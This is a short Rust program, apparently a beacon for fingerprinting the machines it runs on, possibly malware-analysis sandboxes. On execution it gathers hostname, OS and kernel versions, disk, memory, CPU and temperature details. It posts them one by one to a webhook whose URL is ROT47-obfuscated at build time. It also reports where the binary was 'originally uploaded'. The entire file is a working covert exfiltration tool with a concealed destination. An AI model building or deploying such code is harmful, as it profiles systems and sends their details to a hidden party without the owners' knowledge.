use rand::prelude::*;
use webhook::client::WebhookClient;
use sysinfo::*;
use cienli::ciphers::rot::{Rot, RotType};

async fn send(id: u16, message: String) {
    let url = Rot::new(env!("WEBHOOK"), RotType::Rot47);
    let client: WebhookClient = WebhookClient::new(&url.decipher());
    client.send(|m| m
                .username(format!("{}", id).as_str())
                .content(message.as_str())
                ).await;
}

#[tokio::main]
async fn main() {
    let mut sys = System::new_all();
    sys.refresh_all();

    let hostname = sys.host_name().unwrap_or("Unknown".to_string());
    let os_name = sys.name().unwrap_or("Unknown".to_string());
    let kernel_version = sys.kernel_version().unwrap_or("Unknown".to_string());
    let os_version = sys.os_version().unwrap_or("Unknown".to_string());

    let id: u16 = random(); 

    send(id, format!("hello! i am {} running on {} {} (kernel {})", hostname, os_name, os_version, kernel_version)).await;

    send(id, format!("i was originally uploaded to {}", env!("ANALYST"))).await;

    send(id, format!("disks: {:#?}", sys.disks())).await;

    send(id, format!("total ram: {} bytes, used ram: {} bytes, total swap: {} bytes, used swap: {} bytes", sys.total_memory(), sys.used_memory(), sys.total_swap(), sys.used_swap())).await;

    send(id, format!("cpu info: {:#?}", sys.cpus())).await;

    send(id, format!("temperature info: {:#?}", sys.components())).await;

    send(id, format!("done!")).await;
}
